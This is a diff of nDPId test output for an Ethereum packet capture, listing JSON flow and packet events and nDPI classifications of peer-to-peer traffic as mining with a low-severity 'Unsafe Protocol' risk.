00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1578508364922,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364922,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGjuvAqAG4I+nFg909dl+ptEcpAAAAALAC\/\/+OGAAAAgQFtAEDAwUBAQgKItiVxAAAAAAEAgAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364924,"flow_last_seen":1578508364924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364924,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1578508364924,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364924,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtY\/AqAG40frwzd0+dl+QvttrAAAAALAC\/\/85bQAAAgQFtAEDAwUBAQgKItiVxgAAAAAEAgAA"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364925,"flow_last_seen":1578508364925,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364925,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1578508364925,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364925,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHG4wAAEARgdzAqAG4I7T2qXZfdl0As6VnAUq3Z7jOf6Ug2frhkOredmKGawH96dNwPwCsVwwwAuHNRLachJG6Hj8pd5+\/iUKj3xzFalkHy\/4zo7e13\/nakEgcyoOcntMlISOmld4GtANNEoWSHW0IYrUbIiG7qvHSAQP4R7hAGwckxV38aoEQ3R3z6i1sbxgztMaJbhd8mlK6anhGQ6H0+w6JOUS\/FIH4b+eX+gcKRXXgkrfcf69BwK1A+Siq+4ReFiBg"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364925,"flow_last_seen":1578508364925,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364925,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364925,"flow_last_seen":1578508364925,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364925,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1578508364932,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364932,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGkHGfy1QfwKgBuHZf3TprW2X93LDPrKAScSCdQwAAAgQFrAQCCApPeKo9ItiVagEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1578508364932,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364932,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGhHnAqAG4n8tUH906dl\/csM+sa1tl\/oAQECwsmQAAAQEICiLYlc1PeKo9"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364932,"flow_last_seen":1578508364932,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364932,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1578508364932,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364932,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGvd3AqAG4Etunn90\/dl9+5\/UeAAAAALAC\/\/851wAAAgQFtAEDAwUBAQgKItiVzQAAAAAEAgAA"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364824,"flow_last_seen":1578508364933,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1578508364933,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364824,"flow_last_seen":1578508364933,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1578508364933,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 01877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1578508364954,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1099,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1099,"pkt_l4_len":1065,"thread_ts_msec":1578508364954,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ91J1AACwRmVQjtPapwKgBuHZddl8EKaTIL6PiPVD76wxxux15bHRlnSs2av4nBFSV7v4bhHiIpeAMxLmbK8f6wiaJfQicCaKdl2RU3riNA4G85e32CrySn3+r4nugeiGUNmLmJTGwe70KAk\/1yl9pMbVr5iHiC9EbAQT5A7z5A7T4TYSnVnoygnZfgnZfuECQJNyxBglNPC+n9m4t\/W08TtywpdWYdWjkRxmhkajaDCz+gK\/mbTitDTyIYj\/DM6dFql13rAhhOsl+TepFcV7R+E2EVmvzPoJ2X4J2X7hAs1lDgaitKFA3cxLdFsLwt7VebQyms4a6o\/fivZtKo8AkJ6dL4w4Dn4+\/vC\/\/JsKeSIScYYBOpqnxxVMZ+XWFxvhNhIui\/9KCdl+Cdl+4QKesUvPGk3pcExPSpjjyYak+S\/zgRaKyCtkCAnADlTupsK\/kU6vbTyjVeYLvjRqhlLfuaobh1XsP1yYWbMEwCkP4TYROL5ObgnZfgnZfuEBjjxCUsfvwMHRxTE5YrP7+ISCuREmPbKrzjoabqIoNEUz\/YRnAV2w6k47DZjKIksCMD5bt88unhn0EsLYp\/SzX+E2EXkQ3ooJ2X4J2X7hAPuP3gMJbiMdT+jVwpl443XaSBNUfQ0qZUmbru+9L8er4h7zKFM+7c1K4WVxLv0mgiZa++5g5WXQyn8nQTgubb\/hNhIpLq76Cdl+Cdl+4QPw+TE9tCaxzvKUZLrSUydGaIDt2Km6jvC1h7Hg9CIqQESMae7r6mkOxEncigdCNSYhdj\/fphc\/puhfvJzVEsBH4TYQj6yXYgnZfgnZfuEC5nQSZ\/xzD17vSEoHg\/jtmGLuRaM3q97\/3Czva8FggRyrw44MHO8OtruMk8OoTJc88hHmdKvMBoeGC+K0eEhFi+E2Ep1ZKIYJ2XYJ2XbhAYZoPsgtYlBM737vFkYUTo\/9EphiWRNvy3F9PFQKE60Wg2vh7fDKeVFJ2s+C3+rlsvule\/8FMZch7lhCdhu+rUPhNhJ3mmFeCdl+Cdl+4QGQs+WUN2IadQlJdv2hYAS47TWT0deczhHq293QjQaQ5dBSGXZU4dOj17ZGw5OHFM97hStHWuydqVFmyRxRg\/w34TYQ050sDgsVJgsVJuEDzSXu93jNII3idYaebqM1QwrATGCoZMfOLWHKo8\/HNEvGmOW1TsZdycKJciiZgh6ud1sRz67L9tP+HeODfKFTV+E2EDfsOx4J2X4J2X7hAH7mV1eGOz5WoeIocWFwRYF7ZVBDRcdtaFFH5u23BFJ62FH1ch71cEmxc8OtYpiPqb2N3y6mQjsQPeWAgtQws9vhNhCPknjSCdl+Cdl+4QFeAPtyTjNbAmZsxJ+YSStMfUptpi+Ck9CtWlo\/Fnkmot5zzhg4wYebjEaqIDMNNKgYreTwT+o6X4euclIzcKBSEXhYgYA=="} 01017{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1578508364954,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"thread_ts_msec":1578508364954,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHF1J5AACwRm8sjtPapwKgBuHZddl8BsQR1SNeP1ZrG\/ZwtEcGW5vGA0sDGp78prdWhxHtDqEDU7PNKL6kZEdICkE\/ClTr5riDvJ\/S0Juy5pZvsiDZ34LyanRNXXRjpzjohXnlvDARKWl\/FPyuFUx\/5q7iG79kKNiaGAAT5AUT5ATz4TYS5GczRgm\/xgm\/xuEBa13f1PeAY+pXn+QDG2H2vRnbUjALc47yKM1DGaLaCBXAmqDZbTzNfSqGBTAVPFFnsJtnCFC0Fv0w0bIIRmdWp+E2EijsROoJ2X4J2X7hAJi3PrTUi8k0+hp72TGveiEIya6qIgjO27CDPgcM2XClPC4ML\/96HDCNIKvA6L6b3KKoTFoGm44u2hTJ2hJ9PJvhNhM+0ztiCdl+Cdl+4QCCTHaJCBMKOiAeM0+J0ILaNmDQGKBpq95aDifzAyS6BBPIijEGzkyTvF6L1V27y7PdVSWOVkbAaliLEx1mlVCv4TYRf2EBxgnX+gnX+uEAuHZY2QcmV8WQCz4M\/VG5LfG7tHam\/sFovnjhq\/yEXmxTFgIMHUbncizgn1Jn7XeiL7CoOoCVHxB7uvvn28VO3hF4WIGA="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1578508364957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364957,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGw5PR+vDNwKgBuHZf3T7\/g0hGkL7bbKAScSAsgwAAAgQFrAQCCAoN8FcJItiVxgEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1578508364957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364957,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtZvAqAG40frwzd0+dl+Qvtts\/4NIR4AQECy8HAAAAQEICiLYleUN8FcJ"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364924,"flow_last_seen":1578508364958,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508364958,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364924,"flow_last_seen":1578508364958,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508364958,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1578508364990,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364990,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGxNei5B2gwKgBuHZf3TsLfbp+uLewXqAScSA1yAAAAgQFrAQCCArR1xFdItiVcAEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1578508364990,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364990,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGt9\/AqAG4ouQdoN07dl+4t7BeC326f4AQECzE7QAAAQEICiLYlgPR1xFd"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364832,"flow_last_seen":1578508364991,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508364991,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364832,"flow_last_seen":1578508364991,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508364991,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365009,"flow_last_seen":1578508365009,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365009,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1578508365009,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365009,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGb3XAqAG4kFt4h91Bdl90OGLhAAAAALAC\/\/+IEgAAAgQFtAEDAwUBAQgKItiWFAAAAAAEAgAA"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365021,"flow_last_seen":1578508365021,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365021,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -181,29 +181,29 @@ 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1578508365038,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365038,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG\/kfAqAG4DeZsKt1Edl+KMGOvAAAAALAC\/\/8AAwAAAgQFtAEDAwUBAQgKItiWLQAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1578508365039,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365039,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGe3mQW3iHwKgBuHZf3UEpl2emdDhi4qAScSAVuAAAAgQFrAQCCArbhaVwItiWFAEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1578508365039,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365039,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGb4HAqAG4kFt4h91Bdl90OGLiKZdnp4AQECylVgAAAQEICiLYli7bhaVw"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365009,"flow_last_seen":1578508365040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1578508365040,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365009,"flow_last_seen":1578508365040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1578508365040,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365045,"flow_last_seen":1578508365045,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365045,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1578508365045,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365045,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGOT7AqAG4uduFPt1Fdl+PNscoAAAAALAC\/\/\/ScwAAAgQFtAEDAwUBAQgKItiWMgAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1578508365063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365063,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACMG2uES26efwKgBuHZf3T9fy8\/Lfuf1H6ASaN8cNgAAAgQFrAQCCAoSyYNbItiVzQEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1578508365063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365063,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGvenAqAG4Etunn90\/dl9+5\/UfX8vPzIAQECyjNQAAAQEICiLYlkUSyYNb"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364932,"flow_last_seen":1578508365065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":521,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1578508365065,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364932,"flow_last_seen":1578508365065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":521,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1578508365065,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1578508365065,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365065,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGx0OyPgrawKgBuHZf3UIGbP5HMVZ5eqAScSDZAAAAAgQFrAQCCAoLgra+ItiWHgEDAwc="} 